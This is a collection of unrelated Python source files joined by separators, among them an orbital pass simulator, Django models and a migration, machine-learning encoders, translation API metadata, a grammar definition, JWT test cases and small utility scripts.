s_window[1],
s_window[1] + OrbitalSimulator.get_update_duration()
)
@staticmethod
def get_window_duration():
"""Simulation window duration.
Static method that returns the duration of the window for the
Simulation calculations of the slots.
"""
return datetime.timedelta(days=3)
@staticmethod
def get_simulation_window():
"""Simulation window slot.
Static method that returns the current 'in-use' simulation window,
this is, the start and end datetime objects for the simulation of the
slots that is currently being used.
:return: Tuple (start, end) with the simulation window currently in
use (UTC localized).
"""
# From the 'window duration', 1 day has to be substracted (the day in
# course).
start = misc.get_now_utc()
end = misc.get_next_midnight()\
+ OrbitalSimulator.get_window_duration()\
- datetime.timedelta(days=1)
return start, end
def calculate_passes(self, availability_slots):
"""
Calculates the passess for the given spacecraft over the ground_station,
for all the availability slots included in the list.
:param availability_slots: List of tuples with UTC DateTime objects
defining the slots of availability.
:return: A list with all the pass slots linked with the AvailabilitySlot
that generated them.
"""
pass_slots = []
for a_slot_i in availability_slots:
pass_i = self.calculate_pass_slot(a_slot_i[0], a_slot_i[1])
pass_i_id = a_slot_i[2]
pass_slots.append((pass_i, pass_i_id))
return pass_slots
def calculate_pass_slot(
self, start, end, minimum_slot_duration=datetime.timedelta(minutes=1)
):
"""
Calculates the passes available for the given spacecraft in between the
start and end dates.
:param start: The datetime object (UTC) that defines the start of the
simulation.
:param end: The datetime object (UTC) that defines the end of the
simulation.
:param minimum_slot_duration: The minimum duration of a slot
:return: List with the datetime objects (UTC) with the passess for
the given Spacecraft over the given GroundStation
:raises ephem.CircumpolarError: Raised whenever a pass for a given
simulation is either always up or the satellite never shows up above the
defined horizon.
"""
if self._test_mode:
if self._fail_test:
raise Exception('TEST TEST TEST EXCEPTION')
return OrbitalSimulator._create_test_operational_slots(start, end)
pass_slots = []
self._observer.date = OrbitalSimulator.datetime_2_ephem_string(start)
last_end = start
while last_end < end:
tr, azr, tt, altt, ts, azs = self._observer.next_pass(self._body)
self._body.compute(self._observer)
if not tr or not ts:
return pass_slots
dt_tr = misc.localize_datetime_utc(tr.datetime())
dt_ts = misc.localize_datetime_utc(ts.datetime())
if dt_tr > end:
break
if dt_ts > end:
slot_end = end
else:
slot_end = dt_ts
if (slot_end - dt_tr) > minimum_slot_duration:
pass_slots.append((dt_tr, slot_end))
self._observer.date = ts + ephem.minute
last_end = misc.localize_datetime_utc(
self._observer.date.datetime()
)
return pass_slots
@staticmethod
def arrays_2_groundtrack(timestamps, latitudes, longitudes):
"""
Converts the 3 oArrays into a single groundtrack array with objects as
items.
:param timestamps: array with the timestamps
:param latitudes: array with the latitudes
:param longitudes: array with the longitudes
:return: Array where each element is { timestamp, latitude, longitude }.
The first timestamp is "start" and the last one is
"start+floor(duration/timestamp)*timestamp".
"""
gt = []
i = 0
for ts_i in timestamps:
lat_i = latitudes[i]
lng_i = longitudes[i]
gt.append({
'timestamp': ts_i,
'latitude': lat_i,
'longitude': lng_i
})
i += 1
return gt
def calculate_groundtrack(
self, spacecraft_tle,
interval=None,
timestep=py_td(seconds=20)
):
"""
Calculates the GroundTrack for the spacecraft with the given tle object.
:param spacecraft_tle: TLE for the spacecraft
:param interval: simulation interval
:param timestep: time ellapsed for the calculation of two subsequent
points in the ground track
:return: Array where each element is { timestamp, latitude, longitude }.
The first timestamp is "start" and the last one is
"start+floor(duration/timestamp)*timestamp".
"""
if not interval:
interval = OrbitalSimulator.get_simulation_window()
if self._test_mode:
if self._fail_test:
raise Exception('TEST TEST TEST EXCEPTION')
self.set_spacecraft(spacecraft_tle)
groundtrack = []
date_i = interval[0]
while date_i < interval[1]:
self._body.compute(date_i)
lat_i = numpy.rad2deg(self._body.sublat)
lng_i = numpy.rad2deg(self._body.sublong)
groundtrack.append({
'timestamp': date_i,
'latitude': lat_i,
'longitude': lng_i
})
date_i += timestep
return groundtrack
def __unicode__(self):
return '# ### Body (Spacecraft): ' + str(self._body)\
+ '\n* l0 = ' + self._tle.identifier\
+ '\n* l1 = ' + self._tle.first_line\
+ '\n* l2 = ' + self._tle.second_line\
+ '\n# ### Observer (Ground Station):'\
+ '\n* (lat, long) = (' + str(self._observer.lat) + ', '\
+ str(self._observer.lon) + ')'\
+ '\n* elevation = ' + str(self._observer.elevation)\
+ '\n* horizon = ' + str(self._observer.horizon)\
+ '\n* date = ' + str(self._observer.date)
def __str__(self):
return self.__unicode__()
|
# -*- coding: utf-8 -*-
#this document is used to combine theory and simulation result together to generate
#some new files which is easy to analyze
import pandas as pd
filename_base_theory = 'D:\\document\\matching probability\\data\\version2\\theory\\'
filename_base_simulation = 'D:\\document\\matching probability\\data\\version2\\simulation_result\\'
filename_base_combine_theory_simulation = 'D:\\document\\matching probability\\data\\version2\\combined_theory_simulation\\'
column_names = ['seeker_probability', 'taker_waiting_probability', 'taker_traveling_probability', 'whole_matching_probability',
'traveling_distance', 'shared_distance', 'save_distance']
name_prefixes = ['theory_', 'simulation_']
pick_up_waiting_time_list = [1,2,4,6,8,10]
maximum_matching_radius_list = [0,1,2,4,6,8,10]
maximum_detour_time_list = [0,1,2,4,6,8,10]
scale_list = [1,0.5,0.1,0.06,0.04,0.02,0.01,0.001]
def get_theory_result_for_one_scenario(pi, ri, di, si):
filename_extra_term = str(pi) + '_' + str(ri) + '_' + str(di) + '_' + str(si) + '.txt'
filename = filename_base_theory + filename_extra_term
df = pd.read_csv(filename, sep = '\t', skiprows = 2, names = column_names)
return df
def get_simulation_result_for_one_scenario(pi, ri, di, si):
filename_extra_term = str(pi) + '_' + str(ri) + '_' + str(di) + '_' + str(si) + '.csv'
filename = filename_base_simulation + filename_extra_term
df = pd.read_csv(filename, sep = ',')
return df
def combine_theory_simulation_for_one_scenario(pi, ri, di, si):
filename_extra_term = str(pi) + '_' + str(ri) + '_' + str(di) + '_' + str(si) + '.csv'
df_theory = get_theory_result_for_one_scenario(pi, ri, di, si)
df_simulation = get_simulation_result_for_one_scenario(pi, ri, di, si)
new_column_names = []
for column_name in column_names:
for name_prefix in name_prefixes:
new_column_names.append(name_prefix + column_name)
df_combine = pd.DataFrame(columns = new_column_names)
for column_name in column_names:
df_combine['theory_' + column_name] = df_theory[column_name]
df_combine['simulation_' + column_name] = df_simulation[column_name]
filename_combine = filename_base_combine_theory_simulation + filename_extra_term
df_combine.to_csv(filename_combine, sep = ',', index = False)
return df_combine
def combine_theory_simulation_for_all_scenarios():
for pi in range(len(pick_up_waiting_time_list)):
for ri in range(len(maximum_matching_radius_list)):
for di in range(len(maximum_detour_time_list)):
for si in range(len(scale_list)):
combine_theory_simulation_for_one_scenario(pi, ri, di, si)
if __name__ == "__main__":
combine_theory_simulation_for_all_scenarios()
#combine_theory_simulation_for_one_scenario(0, 2, 3, 2)
|
from django.db import models
# Create your models here.
class User(models.Model):
uid = models.IntegerField(primary_key=True)
age = models.PositiveSmallIntegerField()
sex = models.CharField(max_length=5, choices=(("M", "Man"), ("F", "Femme")))
postal_code = models.CharField(max_length=500)
occupation = models.ForeignKey('Occupation', on_delete=models.CASCADE)
def __str__(self):
return str(self.uid)
class Occupation(models.Model):
name = models.CharField(max_length=500)
def __str__(self):
return self.name
class Category(models.Model):
cid = models.IntegerField(primary_key=True)
name = models.TextField(max_length=500)
def __str__(self):
return self.name
class Meta:
verbose_name_plural = "categories"
class Film(models.Model):
fid = models.IntegerField(primary_key=True)
title = models.CharField(max_length=100)
year = models.DateField(null=True, blank=True)
url = models.URLField()
rating = models.ManyToManyField(User, through='Rate')
categories = models.ManyToManyField(Category)
def __str__(self):
return self.title
class Rate(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
film = models.ForeignKey(Film, on_delete=models.CASCADE)
number = models.SmallIntegerField()
def __str__(self):
return str(self.number)
|
"""
Piecewise convolutional networks as encoder
"""
import torch
import torch.nn as nn
class PcnnEncoder(nn.Module):
def __init__(self, opt):
super(PcnnEncoder, self).__init__()
self.opt = opt
self.activation = nn.ReLU(inplace=True)
self.dropout = nn.Dropout(opt.dropout_keep)
self.cnn = nn.Conv2d(
in_channels=1,
out_channels = opt.hidden_size,
kernel_size=(opt.cnn_window_size, opt.word_vec_size + 2*opt.position_size),
stride=(1,1),
padding=(1, 0)
)
def forward(self, embeddings, masks):
"""
Encode embeddings, using piece-wise convolutional networks.
Here, we suppose the total number of sentences in bags is batch_size.
Args:
embeddings: [batch_size, num_step, embedding_size]
masks: [batch_size, num_step]
Return:
hidden state of each sentence: [batch_size, hidden_size]
"""
# embeddings = torch.unsqueeze(embeddings, dim=1)
embeddings.unsqueeze_(dim=1)
x = self.cnn(embeddings) # [batch_size, out_channel, num_step, 1]
masks.unsqueeze_(dim=1) # [batch_size, 1, num_step, 3]
x, _ = torch.max(masks + x, dim=2)
x = x - 100
x = x.view(-1, self.opt.hidden_size * 3)
return self.dropout(self.activation(x))
|
# -*- coding: utf-8 -*-
DESC = "tmt-2018-03-21"
INFO = {
"TextTranslate": {
"params": [
{
"name": "SourceText",
"desc": "待翻译的文本,文本统一使用utf-8格式编码,非utf-8格式编码字符会翻译失败,请传入有效文本,html标记等非常规翻译文本会翻译失败。单次请求的文本长度需要低于2000。"
},
{
"name": "Source",
"desc": "源语言,参照Target支持语言列表"
},
{
"name": "Target",
"desc": "目标语言,参照支持语言列表\n<li> zh : 中文 </li> <li> en : 英文 </li><li> jp : 日语 </li> <li> kr : 韩语 </li><li> de : 德语 </li><li> fr : 法语 </li><li> es : 西班牙文 </li> <li> it : 意大利文 </li><li> tr : 土耳其文 </li><li> ru : 俄文 </li><li> pt : 葡萄牙文 </li><li> vi : 越南文 </li><li> id : 印度尼西亚文 </li><li> ms : 马来西亚文 </li><li> th : 泰文 </li><li> auto : 自动识别源语言,只能用于source字段 </li>"
},
{
"name": "ProjectId",
"desc": "项目id"
}
],
"desc": "提供中文到英文、英文到中文的等多种语言的文本内容翻译服务, 经过大数据语料库、多种解码算法、翻译引擎深度优化,在新闻文章、生活口语等不同语言场景中都有深厚积累,翻译结果专业评价处于行业领先水平。\n"
},
"ImageTranslate": {
"params": [
{
"name": "SessionUuid",
"desc": "唯一id,返回时原样返回"
},
{
"name": "Scene",
"desc": "doc:文档扫描"
},
{
"name": "Data",
"desc": "图片数据的Base64字符串,图片大小上限为4M,建议对源图片进行一定程度压缩"
},
{
"name": "Source",
"desc": "源语言,支持语言列表<li> zh : 中文 </li> <li> en : 英文 </li>"
},
{
"name": "Target",
"desc": "目标语言,支持语言列表<li> zh : 中文 </li> <li> en : 英文 </li>"
},
{
"name": "ProjectId",
"desc": "项目id"
}
],
"desc": "提供中文到英文、英文到中文两种语言的图片翻译服务,可自动识别图片中的文本内容并翻译成目标语言,识别后的文本按行翻译,后续会提供可按段落翻译的版本"
},
"SpeechTranslate": {
"params": [
{
"name": "SessionUuid",
"desc": "一段完整的语音对应一个SessionUuid"
},
{
"name": "Source",
"desc": "音频中的语言类型,支持语言列表<li> zh : 中文 </li> <li> en : 英文 </li>"
},
{
"name": "Target",
"desc": "翻译目标语⾔言类型 ,支持的语言列表<li> zh : 中文 </li> <li> en : 英文 </li>"
},
{
"name": "AudioFormat",
"desc": "pcm : 146 amr : 33554432 mp3 : 83886080"
},
{
"name": "Seq",
"desc": "语音分片的序号,从0开始"
},
{
"name": "IsEnd",
"desc": "是否最后一片语音分片,0-否,1-是"
},
{
"name": "Data",
"desc": "语音分片内容的base64字符串,音频内容应含有效并可识别的文本"
},
{
"name": "ProjectId",
"desc": "项目id,用户可自定义"
},
{
"name": "Mode",
"desc": "识别模式,不填则由调用放进行vad(静音检测),填bvad则由服务放进行vad,前者适合段语音翻译(收到所有语音分片后翻译),后者适合长语音翻译(在完成一个断句识别后就会返回部分结果)"
}
],
"desc": "本接口提供音频内文字识别 + 翻译功能,目前开放中到英的语音翻译服务。\n待识别和翻译的音频文件可以是 pcm、mp3、amr和speex 格式,音频内语音清晰,采用流式传输和翻译的方式。\n"
},
"LanguageDetect": {
"params": [
{
"name": "Text",
"desc": "待识别的文本,文本统一使用utf-8格式编码,非utf-8格式编码字符会翻译失败。单次请求的文本长度需要低于2000。"
},
{
"name": "ProjectId",
"desc": "项目id"
}
],
"desc": "可自动识别文本内容的语言种类,轻量高效,无需额外实现判断方式,使面向客户的服务体验更佳。 "
}
}
|
import flask
import config
def render_rivets_client(page_mode, sign_response=None, send_response=None, release_response=None):
return flask.render_template(
"client.html",
page_mode=page_mode,
environment=config.ENVIRONMENT,
public_apigee_url=config.PUBLIC_APIGEE_URL,
base_url=config.BASE_URL,
sign_response=sign_response,
send_response=send_response,
release_response=release_response,
)
def render_react_client(page_mode):
return flask.render_template(
"client_v2.html",
page_mode=page_mode,
environment=config.ENVIRONMENT,
public_apigee_url=config.PUBLIC_APIGEE_URL,
base_url=config.BASE_URL
)
|
from .classic_model import ClassicModel
from .classic_user import ClassicSystemUser
|
from parsimonious import Grammar
ws = r"""
_ = comment / line_comment / ~"\s*"
ws = ~"\s+"
le = ~"(\r\n|\r|\n)"
comment_start = "/*"
comment_end = "*/"
comment_content = comment / (!comment_start !comment_end ~"."s)
comment = comment_start comment_content* comment_end
line_comment = ~"//.*" le
"""
qualifier = r"""
qualifier = "public" / "protected" / "private" / "static" / "final" /
"const" / "native" / "exec" / "cb" /
"abstract" / "persistent" / "inline" / "edit" / "rep"
qualifierlist = (qualifier ws)*
"""
ident = r"""
ident = ~"[a-z_][\w\.]*"ai
number = ~"-?\d+(\.\d*)?f?"ai
string = ~r"\"(?:[^\\\"\\]|\\.)*\""
"""
symbols = r"""
lbrace = "{"
rbrace = "}"
lparen = "("
rparen = ")"
listsep = _ "," _
typesep = _ ":" _
gt = ">"
lt = "<"
equal = "="
"""
annotation = r"""
annotationlist = (annotation ws)*
annotation = "@" ident lparen _ annotation_paramlist? _ rparen
annotation_paramlist = annotation_param (listsep annotation_param)*
annotation_param = number / string / annotation_ident
annotation_ident = ~"[^\,\)]+"ai
"""
type_ = r"""
type = ident _ type_wrapped? _
type_wrapped = lt _ type _ type_arg? _ gt
type_arg_sep = ";" _
type_arg = type_arg_sep type_arg_value*
type_arg_value = !gt ~"."
"""
params = r"""
parameters = lparen _ param_list? _ rparen
param_list = param (listsep param)*
param = param_ident typesep type _
param_ident = param_qualifier ident
param_qualifier = (("out" / "opt") ws)?
"""
function = r"""
func = func_sig _ func_body?
func_sig = annotationlist qualifierlist "func" _ func_name _ parameters _ func_return_type
func_name = ident?
func_return_type = "->" _ type
func_body_start = lbrace
func_body_end = rbrace
func_body_content = func_body / (!func_body_start !func_body_end ~"."s)
func_body = func_body_start func_body_content* func_body_end _
"""
enum = r"""
enum = "enum" ws ident _ enum_body _
enum_body = lbrace _ enum_list? _ rbrace
enum_list = enum_decl (_ listsep _ enum_decl)* listsep?
enum_decl = ident _ equal _ enum_value
enum_value = ~"-?\d+"a
"""
class_ = r"""
class = qualifierlist ("class" / "struct") ws ident _ class_extends? _ class_body
class_extends = "extends" ws ident
class_body = lbrace class_member* rbrace _
class_member = class_field / func / _
class_field = annotationlist qualifierlist "let" ws ident _ typesep _ type _ ";"
"""
grammar = Grammar(
"""
definitions = _ definition*
definition = enum / func / class
"""
+ class_
+ enum
+ annotation
+ function
+ params
+ type_
+ qualifier
+ ws
+ symbols
+ ident
)
|
import ast
import types
from sherlock.errors import CompileError, SyntaxNotSupportError, FunctionIsNotAnalyzedError
from sherlock.codelib.analyzer.variable import Variables, Type
from sherlock.codelib.analyzer.function import Functions
from sherlock.codelib.generator.temp_variable import TempVariableManager
CONTEXT_STATUS_GLOBAL = 1
CONTEXT_STATUS_FUNCTION = 2
class CodeGenerator(object):
EXTENSIONS = [
'sherlock.codelib.generator.implements.simple_generator',
'sherlock.codelib.generator.implements.compare_op',
'sherlock.codelib.generator.implements.statement',
'sherlock.codelib.generator.implements.binop',
'sherlock.codelib.generator.implements.assignment',
'sherlock.codelib.generator.implements.function',
'sherlock.codelib.generator.implements.importing',
'sherlock.codelib.system_function',
'sherlock.codelib.cmd',
]
def __init__(
self,
code=None,
node=None,
context_status=CONTEXT_STATUS_GLOBAL,
functions=Functions(),
variables=Variables(),
function_info=None
):
for extension in CodeGenerator.EXTENSIONS:
__import__(extension)
self.context_status = context_status
self.global_generator = None
self.functions = functions
self.code = code
self.node = node
self.variables = variables
self.temp_variable = TempVariableManager('__temp_var')
self.code_buffer = []
self.function_info = function_info
@property
def is_global(self):
return self.context_status == CONTEXT_STATUS_GLOBAL
def append_code(self, code):
self.code_buffer.append(code)
def dispatch(self, node, ext_info={}):
from sherlock.codelib.generator.dispatcher import AST_NODE_DISPATCHER
generator = AST_NODE_DISPATCHER.get(node.__class__)
if generator is None:
raise SyntaxNotSupportError("%s is not support yet." % node.__class__.__name__)
return generator(self, node, ext_info)
def generate(self):
if self.node is None:
self.node = ast.parse(self.code)
if isinstance(self.node, ast.Module):
for x in self.node.body:
code_slice = self.dispatch(x)
if code_slice is not None:
self.code_buffer.append(code_slice)
return '\n'.join(self.code_buffer) + '\n'
elif isinstance(self.node, ast.FunctionDef):
if self.function_info is None:
raise FunctionIsNotAnalyzedError(self.node.name)
if not len(self.node.decorator_list) == 0:
raise SyntaxNotSupportError('Function decoration is not support yet.')
arguments_list = []
for i, x in enumerate(self.node.args.args):
if self.function_info.args_type[i].is_list:
arguments_list.append('declare -a %s=("${!%i}")' % (self.dispatch(x), i + 1))
else:
arguments_list.append('%s=$%i' % (self.dispatch(x), i + 1))
arguments_code = '\n'.join(arguments_list)
for x in self.node.body:
self.code_buffer.append(self.dispatch(x, {'func_name': self.node.name}))
return 'function %s() {\n%s\n%s\n}' % (self.node.name, arguments_code, '\n'.join(self.code_buffer))
else:
raise CompileError("code section must be function or module node")
def get_type(self, node):
if isinstance(node, ast.Num):
return Type.NUMBER
elif isinstance(node, ast.Str):
return Type.STRING
elif isinstance(node, ast.Name):
if self.variables[node.id] is not None:
return self.variables[node.id].var_type
else:
return Type.VOID
elif isinstance(node, ast.BinOp):
if self.get_type(node.left).is_number and self.get_type(node.right).is_number:
return Type.NUMBER
elif self.get_type(node.left).is_string or self.get_type(node.right).is_string:
return Type.STRING
elif isinstance(node, ast.Call):
return self.functions[node.func.id].return_type
else:
return Type.VOID
|
# -*- coding: utf-8 -*-
"""
:authors: - Tobias Grosch
"""
import os
class RegisterFactory:
@staticmethod
def get_register(arguments, config_parser):
return SimpleRegister()
class SimpleRegister:
def check(self, file_path):
return os.path.isfile(file_path)
def add(self, file_path):
pass
|
import json
from unittest import mock
from django.contrib.auth import get_user_model
from django.test import RequestFactory, testcases
import graphene
from graphene_django.views import GraphQLView
from graphql.execution.execute import GraphQLResolveInfo
from graphql_jwt.decorators import jwt_cookie
from graphql_jwt.settings import jwt_settings
from graphql_jwt.testcases import JSONWebTokenClient, JSONWebTokenTestCase
from graphql_jwt.utils import jwt_encode, jwt_payload
class UserTestCase(testcases.TestCase):
def setUp(self):
self.user = get_user_model().objects.create_user(
username='test',
password='dolphins',
)
class TestCase(UserTestCase):
def setUp(self):
super().setUp()
self.payload = jwt_payload(self.user)
self.token = jwt_encode(self.payload)
self.request_factory = RequestFactory()
def info(self, user=None, **headers):
request = self.request_factory.post('/', **headers)
if user is not None:
request.user = user
return mock.Mock(
context=request,
path=['test'],
spec=GraphQLResolveInfo,
)
class SchemaTestCase(TestCase, JSONWebTokenTestCase):
class Query(graphene.ObjectType):
test = graphene.String()
Mutation = None
def setUp(self):
super().setUp()
self.client.schema(query=self.Query, mutation=self.Mutation)
def execute(self, variables=None):
assert self.query, ('`query` property not specified')
return self.client.execute(self.query, variables)
def assertUsernameIn(self, payload):
username = payload[self.user.USERNAME_FIELD]
self.assertEqual(self.user.get_username(), username)
class RelaySchemaTestCase(SchemaTestCase):
def execute(self, variables=None):
return super().execute({'input': variables})
class CookieClient(JSONWebTokenClient):
def post(self, path, data, **kwargs):
kwargs.setdefault('content_type', 'application/json')
return self.generic('POST', path, json.dumps(data), **kwargs)
def set_cookie(self, token):
self.cookies[jwt_settings.JWT_COOKIE_NAME] = token
def execute(self, query, variables=None, **extra):
data = {
'query': query,
'variables': variables,
}
view = GraphQLView(schema=self._schema)
request = self.post('/', data=data, **extra)
response = jwt_cookie(view.dispatch)(request)
content = self._parse_json(response)
response.data = content.get('data')
response.errors = content.get('errors')
return response
class CookieTestCase(SchemaTestCase):
client_class = CookieClient
def set_cookie(self):
self.client.set_cookie(self.token)
class RelayCookieTestCase(RelaySchemaTestCase, CookieTestCase):
"""RelayCookieTestCase"""
|
# Generated by Django 2.1.9 on 2019-07-02 03:50
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('contacts', '0005_auto_20190630_0943'),
('hackathons', '0006_sponsorship_notes'),
]
operations = [
migrations.CreateModel(
name='Lead',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('status', models.CharField(choices=[('U', 'Uncontacted'), ('C', 'Contacted')], max_length=1)),
('role', models.CharField(choices=[('N', 'None'), ('P', 'Primary')], max_length=1)),
('notes', models.TextField(blank=True)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('contact', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='leads', to='contacts.Contact')),
],
),
migrations.AddField(
model_name='hackathon',
name='created_at',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AddField(
model_name='hackathon',
name='updated_at',
field=models.DateTimeField(auto_now=True),
),
migrations.AddField(
model_name='perk',
name='created_at',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AddField(
model_name='perk',
name='updated_at',
field=models.DateTimeField(auto_now=True),
),
migrations.AddField(
model_name='tier',
name='created_at',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AddField(
model_name='tier',
name='updated_at',
field=models.DateTimeField(auto_now=True),
),
migrations.AlterField(
model_name='sponsorship',
name='status',
field=models.CharField(choices=[('preparing', 'Preparing'), ('contacted', 'Contacted'), ('responded', 'Responded'), ('confirmed', 'Confirmed'), ('denied', 'Denied'), ('ghosted', 'Ghosted'), ('paid', 'Paid')], max_length=12),
),
migrations.AddField(
model_name='lead',
name='sponsorship',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='leads', to='hackathons.Sponsorship'),
),
]
|
#!/usr/bin/env python3
import sys
sys.path.insert(0,'../')
from aoc_input import *
import networkx as nx
if len(sys.argv) != 2:
print('Usage:', sys.argv[0], '<input.txt>')
sys.exit(1)
a = input_as_lines(sys.argv[1])
G = nx.Graph()
for line in a:
a, b = re.findall(r'([A-Za-z]+)', line)
if not a in G:
G.add_node(a)
if not b in G:
G.add_node(b)
G.add_edge(a, b)
num = 0
# print all paths from node to goal
# Algorithm from https://www.geeksforgeeks.org/find-paths-given-source-destination/
def all_paths(node, goal, visited, path):
global num
# Mark the current node as visited and store in path
visited[node] += 1
path.append(node)
#print(node, path)
if node == goal:
#print(path)
num += 1
else:
# Recurse for all adjacent nodes
for neigh in nx.all_neighbors(G, node):
v = visited[neigh]
if v == 0 or neigh.isupper():
# Must copy visited and path here
all_paths(neigh, goal, visited.copy(), path.copy())
# Remove current vertex from path[] and mark it as unvisited
path.pop()
visited[node] -= 1
visited = dict()
for n in G.nodes:
visited[n] = 0
path = []
all_paths('start', 'end', visited, path)
print(num)
|
TEXTS_COLLECTION = "texts"
CHAPTERS_COLLECTION = "chapters"
FRAGMENTS_COLLECTION = "fragments"
|
from .vannilla import SimpleModel
import tensorflow as tf
import numpy as np
import os.path as osp
import random
class DropOutModel(SimpleModel):
def __init__(self, *args, **kwargs):
SimpleModel.__init__(self, *args, **kwargs)
self.keep_prob = kwargs.get('keep_prob')
self.n_bayes_samples = kwargs.get('n_bayes_samples', 1)
def _feature_extraction_model(self, input_data, drop_out_prob=None, name='feature_model',
reuse=False):
if not drop_out_prob:
drop_out_prob = tf.constant(self.keep_prob, dtype=tf.float32)
layer = input_data
with tf.variable_scope(name):
for i, layer_dim in enumerate(self.feat_ext_dim_list[1:]):
layer = tf.layers.dense(layer, layer_dim, activation=tf.nn.relu,
reuse=reuse, name='feat_fc'+str(i))
layer = tf.nn.dropout(layer, drop_out_prob)
return layer
def _comparison_model(self, input_data, drop_out_prob=None, name='compare_model', reuse=False):
if not drop_out_prob:
drop_out_prob = tf.constant(self.keep_prob, dtype=tf.float32)
layer = input_data
w_list, b_list = [], []
with tf.variable_scope(name):
for i, layer_dim in enumerate(self.compare_nn_dim_list[1:-1]):
layer, w, b = self._sym_fc_layer(layer, layer_dim, activation_fn='Relu',
reuse=reuse, scope=name+str(i))
layer = tf.nn.dropout(layer, drop_out_prob)
w_list.append(w)
b_list.append(b)
logits, w, b = self._sym_fc_layer(layer, 2, reuse=reuse, scope='fc_out')
w_list.append(w)
b_list.append(b)
return logits, w_list, b_list
def query(self, input1, input2):
nn_input1 = np.array(input1)
nn_input2 = np.array(input2)
if nn_input1.ndim == 1:
nn_input1 = nn_input1[None, :]
if nn_input2.ndim == 1:
nn_input2 = nn_input2[None, :]
feed_dict = {
self.input1: nn_input1,
self.input2: nn_input2,
}
avg_prediction = dict()
for kwrd in self.spec_kwrd_list:
avg_prediction[kwrd] = 0
for _ in range(self.n_bayes_samples):
prediction_dict = self.sess.run(self.out_predictions, feed_dict=feed_dict)
for kwrd in self.spec_kwrd_list:
avg_prediction[kwrd] += prediction_dict[kwrd]/self.n_bayes_samples
self.logger.log_text('{}'.format(avg_prediction), stream_to_stdout=False,
fpath=osp.join(self.logger.log_path, 'avg_prediction.txt'))
return avg_prediction
def evaluate(self):
"""
A function that evaluates the nn with oracle data to see how they compare
"""
assert self.evaluate_flag, 'To evaluate the evalute flage must be set to True'
oracle_feed_dict = {
self.input1: self.oracle_input1,
self.input2: self.oracle_input2,
}
for kwrd, tensor in self.true_labels.items():
oracle_feed_dict[tensor] = self.labels[kwrd]
avg_accuracy, avg_predictions = {}, {}
for kwrd in self.spec_kwrd_list:
avg_accuracy[kwrd] = 0
avg_predictions[kwrd] = 0
for _ in range(self.n_bayes_samples):
accuracy, predictions = self.sess.run([self.accuracy, self.out_predictions],
feed_dict=oracle_feed_dict)
for kwrd in self.spec_kwrd_list:
avg_predictions[kwrd] += predictions[kwrd]/self.n_bayes_samples
avg_accuracy[kwrd] += accuracy[kwrd]/self.n_bayes_samples
# see if nn says input1 is better than input2 for all rows according to the critical specs
nn_is_1_better = []
for i in range(len(self.df)):
is_1_better = all([random.random() > avg_predictions[kwrd][i][0]
for kwrd in self.df['critical_specs'][i]])
nn_is_1_better.append(is_1_better)
# compute all accuracy numbers (oracle_nn): false_false, true_true, false_true, true_false
ff, tt = 0, 0
ft, tf = 0, 0
for nn_vote, oracle_vote in zip(nn_is_1_better, self.oracle_is_1_better):
if not nn_vote and not oracle_vote:
ff+=1
elif nn_vote and oracle_vote:
tt+=1
elif not nn_vote and oracle_vote:
tf+=1
elif nn_vote and not oracle_vote:
ft+=1
total_accuracy = (tt+ff)/(tt+ff+tf+ft)
# how many of those that oracle says are good nn says are good: very important, should be 1
a1 = tt/(tf+tt)
# how many of those that nn says good are actually good: very important, should be 1,
a2 = tt/(ft+tt)
# indicates that nn doesn't add useless data
# how many of those that oracle says are bad nn says are bad: should be 1, indicates that
a3 = ff/(ff+ft)
# nn can prune out the space efficiently
# how many of those that nn says bad are actually bad: should be 1
a4 = ff/(tf+ff)
avg_accuracy["total_acc"] = total_accuracy
avg_accuracy["a1"] = a1
avg_accuracy["a2"] = a2
avg_accuracy["a3"] = a3
avg_accuracy["a4"] = a4
avg_accuracy["tt"] = tt
avg_accuracy["ff"] = ff
avg_accuracy["tf"] = tf
avg_accuracy["ft"] = ft
self.df_accuracy = self.df_accuracy.append(avg_accuracy, ignore_index=True)
self.logger.store_db(self.df_accuracy, fpath=osp.join(self.eval_save_to,
self.file_base_name + '.pkl'))
self.logger.log_text(avg_accuracy, stream_to_stdout=False, fpath=self.acc_txt_file)
|
def leiaint(msg):
while True:
try:
i = int(input(msg))
except KeyboardInterrupt:
print('entrada de dados interrompida pelo usuario.')
break
except (ValueError, TypeError):
print(f'\033[0;31m ERRO! digite um numero valido \033[m')
continue
else:
return i
def leiafloat(msg):
while True:
try:
f = float(input(msg))
except:
print(f'\033[0;31m ERRO! digite um numero valido \033[m')
else:
return f
i = leiaint('digite um numero inteiro: ')
f = leiafloat('digite um numero real: ')
print(f'os valores digitados foram {i} e {f}')
|
import os
import pickle
from sys import platform
import time
import timeit
import itertools
import file_object
import mimeDict
from test_import import *
# aList = [1,2,3]
# bList = [4,5,6]
# a, b = tuple(aList), tuple(bList)
# print(type(b))
# print(a)
# print(b)
# print(os.path.isdir('/Users/jd/Documents/Sharpening Business/customer records.numbers'))
# path = '/Users/jd/Documents/Sharpening Business/hey/scam.pdf'
# fileExt = path[path.rfind('.'):]
# print(mimeDict.mimeDict[fileExt])
# pathList = ['a', 'a', 'b', 'c', 'b']
# path = pathList.pop(pathList.index('b'))
# print(path)
# print(pathList)
# a = [1,2,3]
# b = ['a','b','c','d','e']
# for i, j in itertools.zip_longest(a, b):
# if i != None:
# print(i, j)
# xy = [1,2,3]
# for x in []:
# print('hi')
# aSet = {1,2,3}
# bSet = {3,2}
# print(aSet.difference(bSet))
# myList = [1,2,3,4,5]
# for x in myList:
# print(x)
# if x == 3:
# myList.append(6)
# pathName = '/Users/jd/Desktop/Google-Drive-Sync/testing/recursive test/yo/class notes'
# # pathIndex = pathName.rfind('/')
# print(pathName[pathName.rfind('/')+1:])
# print(os.path.exists('/Users/jd/Desktop/Google-Drive-Sync/test destination'))
# slash = '\\'
# print('a'+slash+'c')
# epochTime = os.path.getmtime('/Users/jd/Desktop/Google-Drive-Sync/upload test media/test.txt')
